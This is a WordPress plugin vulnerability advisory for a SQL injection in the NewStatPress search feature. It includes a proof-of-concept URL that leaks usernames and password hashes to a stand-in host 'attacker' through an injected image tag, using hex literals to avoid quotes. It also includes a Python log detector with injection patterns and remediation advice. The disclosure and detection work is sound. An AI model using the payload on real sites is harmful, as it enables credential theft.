NewStatPress <= 1.0.4 - SQL Injection


Description
The Search functionality is susceptible to SQL Injection because user-supplied input is placed into a database query without sanitization.

The vulnerable query is built at line 98 of ‘includes/nsp_search.php’.

Using a specially crafted SQL query, an attacker can trigger disclosure of user password hashes, using an injected IMG tag as the data channel.

Proof of Concept
The following URL triggers the SQL injection, which injects an element into the page; that element then transmits the retrieved user hashes to an attacker-controlled URL. In the PoC below, the query outputs an IMG element pointing to http://attacker/?creds=CREDS, where CREDS is replaced with a concatenated list of usernames and password hashes.

Because the string literals in the payload are supplied hex-encoded (and the exfiltrated data is wrapped in the MySQL function ‘hex’), the payload needs no quote characters, which bypasses the quote escaping implemented by WordPress. Should an Administrative user be tricked into visiting the URL, all of the usernames and password hashes will be transmitted (so long as no restrictive CSP headers are implemented).

http://localhost/wp-admin/admin.php?where1=ip&what1=0&where2=spider+%3D+0+UNION+SELECT+CONCAT%280x3C696D67207372633D22687474703A2F2F61747461636B65722F3F63726564733D%2C%28select+hex%28group_concat%28concat_ws%28char%2858%29%2Cwp_users.user_login%2Cwp_users.user_pass%29%29%29+from+wp_users+group+by+1%3D1%29%2C0x223e%29--&what2=0&searchsubmit=Search&page=nsp_search&newstatpress_action=search
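The payload above is recognisable in web-server logs by a handful of traits the advisory itself describes: a UNION SELECT tail, a trailing comment terminator, hex literals standing in for quoted strings, and a reference to the wp_users table. The following detector is an added example written for this page, not code from the plugin or from the advisory's author. It parses constructed access-log lines (the second reuses the where2= payload shape from the PoC), URL-decodes every query parameter, flags those traits, and decodes the hex literals so an analyst can see what the quote-free payload actually builds. The log format, the indicator names and the two-indicator alert threshold are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory page):
# line 1 is an ordinary NewStatPress search, line 2 carries the where2=
# payload shape from the advisory's proof of concept.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2015:10:00:00 +0000] "GET /wp-admin/admin.php?page=nsp_search&newstatpress_action=search&where1=ip&what1=10.0.0.9&searchsubmit=Search HTTP/1.1" 200 5120
10.0.0.7 - - [07/Jul/2015:10:00:05 +0000] "GET /wp-admin/admin.php?where1=ip&what1=0&where2=spider+%3D+0+UNION+SELECT+CONCAT%280x3C696D67207372633D22687474703A2F2F61747461636B65722F3F63726564733D%2C%28select+hex%28group_concat%28concat_ws%28char%2858%29%2Cwp_users.user_login%2Cwp_users.user_pass%29%29%29+from+wp_users+group+by+1%3D1%29%2C0x223e%29--&what2=0&searchsubmit=Search&page=nsp_search&newstatpress_action=search HTTP/1.1" 200 5300
"""

# Combined-log-format request line (assumed layout for this example).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is applied to the URL-decoded value of every query parameter.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b[\s\S]*?\bselect\b", re.I),
    "comment_terminator": re.compile(r"(--|#|/\*)\s*$"),
    # Hex literals in place of quoted strings: the quote-escaping bypass
    # the advisory describes.
    "hex_literal": re.compile(r"\b0x[0-9a-fA-F]{4,}"),
    "wp_users_ref": re.compile(r"\bwp_users\b|\buser_pass\b", re.I),
}


def decode_hex_literals(value):
    """Return the readable form of every 0x... literal in a parameter value."""
    decoded = []
    for digits in re.findall(r"\b0x([0-9a-fA-F]+)", value):
        if len(digits) % 2:          # MySQL hex literals have an even length
            continue
        decoded.append(bytes.fromhex(digits).decode("utf-8", "replace"))
    return decoded


def inspect_query(target):
    """Decode a request target and report which injection indicators its parameters hit."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    hits, decoded = set(), []
    for values in params.values():
        for value in values:
            for label, pattern in INDICATORS.items():
                if pattern.search(value):
                    hits.add(label)
            decoded.extend(decode_hex_literals(value))
    return {"path": parts.path, "indicators": sorted(hits), "decoded_hex": decoded}


def scan_log(text, min_indicators=2):
    """Return one alert per request whose parameters hit at least min_indicators indicators."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        result = inspect_query(match.group("target"))
        if len(result["indicators"]) >= min_indicators:
            alerts.append({"client": match.group("client"),
                           "timestamp": match.group("ts"), **result})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["client"], alert["path"], alert["indicators"])
        for fragment in alert["decoded_hex"]:
            print("  hex literal decodes to:", repr(fragment))
```

Run against the sample, the second line is reported with all four indicators and the two hex literals decode to the opening `<img src="http://attacker/?creds=` and the closing `">`, which is how the page ends up carrying the exfiltration element without a single quote character in the request. Detection of this kind is a stopgap: the structural fix for a search feature like this one is to accept column names only from an allow-list and pass values through a parameterized query, so that no user-controlled text is ever concatenated into SQL.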

Affects

Plugin newstatpress
fixed in version 1.0.6

References

URL https://research.g0blin.co.uk/g0blin-00057/

Classification

Type MULTI

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 162
Verified No
WPVDB ID 8080

Timeline

Publicly Published 2015-07-07
Added 2015-07-07
Last Updated 2015-07-07

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.